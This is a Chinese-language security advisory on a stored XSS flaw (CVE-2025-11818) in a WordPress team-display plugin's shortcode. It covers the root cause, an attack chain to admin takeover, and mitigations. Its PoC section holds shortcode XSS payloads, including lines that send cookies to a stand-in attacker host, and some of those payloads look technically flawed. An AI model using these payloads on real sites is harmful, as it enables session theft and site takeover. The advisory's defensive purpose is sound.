CVE-2025-11818：WordPress WP Responsive Meet The Team插件存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-11818

漏洞类型

存储型跨站脚本攻击（Stored XSS）

CVSS评分

6.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

WordPress WP Responsive Meet The Team 插件

漏洞概述

CVE-2025-11818是WordPress WP Responsive Meet The Team插件中存在的一个存储型跨站脚本（Stored XSS）漏洞。该插件是一款用于在WordPress网站上展示团队成员信息的响应式插件，支持通过短代码（shortcode）在页面中嵌入团队成员展示模块。该漏洞由Wordfence安全团队的研究员发现并报告，CVSS评分为6.4分，属于中危级别漏洞。

该漏洞影响该插件的所有版本，包括1.0.1及之前的全部版本。漏洞的根本原因在于插件对用户通过'wprm_team'短代码提供的属性参数缺乏充分的输入清理（input sanitization）和输出转义（output escaping）处理。这意味着具有贡献者（contributor）级别或更高权限的认证攻击者可以通过在短代码属性中注入恶意JavaScript代码，将任意Web脚本持久化存储到WordPress数据库中。当其他用户（包括管理员）访问包含恶意短代码的页面时，注入的脚本将在受害者浏览器中自动执行，从而实现会话劫持、权限提升、钓鱼攻击或恶意重定向等攻击行为。

由于WordPress生态系统中插件的广泛使用，此漏洞可能影响大量依赖该插件展示团队信息的网站。虽然利用该漏洞需要至少贡献者级别的认证权限，但许多WordPress网站允许用户注册并自动获得贡献者角色（如多作者博客、会员社区等），这大大降低了实际利用的难度。此外，存储型XSS的危害性远高于反射型XSS，因为恶意载荷会持续存储在服务器端，每次受害者访问相关页面都会触发攻击。

技术细节

该漏洞位于WP Responsive Meet The Team插件的短代码处理逻辑中，具体涉及'wprm_team'短代码的属性解析过程。

**漏洞原理：**

在WordPress中，短代码（shortcode）是一种允许开发者通过方括号语法在文章或页面中嵌入动态内容的机制，例如[wprm_team member="John" role="CEO"]。WordPress核心通过add_shortcode()函数注册短代码处理函数，当页面渲染时，短代码处理器会解析方括号内的属性并将其传递给回调函数。

WP Responsive Meet The Team插件在处理'wprm_team'短代码时，未对用户输入的属性值进行充分的清理和转义处理。具体而言，插件可能直接使用如'member'、'role'、'description'等短代码属性的原始值来构建HTML输出，而没有调用WordPress提供的安全函数如esc_attr()、esc_html()或wp_kses_post()等进行转义。

**利用方式：**

1. 攻击者首先需要拥有一个贡献者（contributor）或更高权限的WordPress账户。
2. 攻击者创建一篇新文章或页面，在内容中插入包含恶意JavaScript代码的'wprm_team'短代码，例如通过在属性值中注入"onerror"、"onload"等事件处理器或<script>标签。
3. 由于是贡献者级别，文章提交后处于待审核状态，但某些配置下可能自动发布，或攻击者通过社会工程学手段诱使管理员审核通过。
4. 一旦文章发布，恶意脚本被持久化存储到WordPress数据库中。
5. 当任何用户（特别是具有管理员权限的用户）访问该页面时，浏览器解析HTML并执行注入的恶意脚本。
6. 恶意脚本可以在受害者上下文中执行任意操作，如窃取cookie、会话令牌，进行权限提升，或将权限提升到管理员级别。

**漏洞位置：**
根据参考链接，漏洞位于插件1.0.1版本的admin/layouts.php文件的第64行附近，该文件负责处理短代码的布局渲染逻辑。

攻击链分析

STEP 1

步骤1：获取认证凭据

攻击者通过注册或购买等方式获得目标WordPress网站的贡献者（contributor）级别或更高权限的账户。许多WordPress网站允许开放注册，贡献者角色可以创建和编辑自己的文章。

STEP 2

步骤2：构造恶意短代码

攻击者创建一篇新文章或页面，在内容中插入精心构造的'wprm_team'短代码，在属性值中嵌入恶意JavaScript代码，如事件处理器（onerror、onmouseover）或script标签。

STEP 3

步骤3：提交并发布恶意内容

攻击者提交文章。如果网站配置为自动审核通过或攻击者通过社会工程学手段诱使管理员审核通过，恶意内容将被发布并存储到WordPress数据库中。

STEP 4

步骤4：等待受害者访问

恶意脚本持久化存储在服务器端。攻击者等待具有更高权限的用户（如管理员、编辑）访问包含恶意短代码的页面。

STEP 5

步骤5：恶意脚本执行

当受害者浏览页面时，浏览器解析HTML并执行注入的JavaScript代码。脚本在受害者的浏览器上下文中运行，可以窃取cookie、会话令牌或执行其他恶意操作。

STEP 6

步骤6：权限提升与持久化

攻击者利用窃取的管理员会话令牌登录后台，创建新的管理员账户或修改现有账户密码，实现对网站的完全控制，并植入后门以维持访问权限。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- 
CVE-2025-11818 PoC - Stored XSS via wprm_team shortcode
Vulnerable Plugin: WP Responsive Meet The Team (versions <= 1.0.1)
Required Access: Contributor level or above
-->

<!-- Normal usage of the shortcode -->
[wprm_team member="John Doe" role="CEO"]

<!-- Malicious shortcode with injected JavaScript via attribute -->
[wprm_team member='" onmouseover="alert(document.cookie)" data-x="' role="Developer"]

<!-- Alternative: Using script injection in description attribute -->
[wprm_team member="<script>alert('XSS')</script>" role="Manager"]

<!-- More sophisticated payload for cookie stealing -->
[wprm_team member='" onerror="fetch(\'https://attacker.com/steal?c=\'+document.cookie)" data-x="' role="Staff"]

<!-- WordPress PHP exploitation example (in post content) -->
<?php
// When contributor creates a post with this content:
$malicious_content = '[wprm_team member="<img src=x onerror=\"var i=new Image;i.src=\'http://attacker.com/log?\'+document.cookie;\">" role="Team Lead"]';
// This gets stored in the database and executes when any user views the page
?>

影响范围

WP Responsive Meet The Team < 1.0.1

WP Responsive Meet The Team 1.0.1

防御指南

临时缓解措施

在官方安全补丁发布之前，建议采取以下临时缓解措施：1）立即禁用或卸载WP Responsive Meet The Team插件，直到修复版本可用；2）如果必须使用该插件，临时将所有用户角色降级，禁止贡献者及以上角色创建新内容；3）在WordPress管理后台审查最近发布的所有文章和页面，查找并删除包含可疑'wprm_team'短代码的内容；4）安装Web应用防火墙（WAF）规则，过滤短代码中的恶意JavaScript代码；5）启用内容安全策略（CSP）限制内联脚本执行；6）重置所有管理员密码并使现有会话失效，以防已被窃取的会话令牌被利用。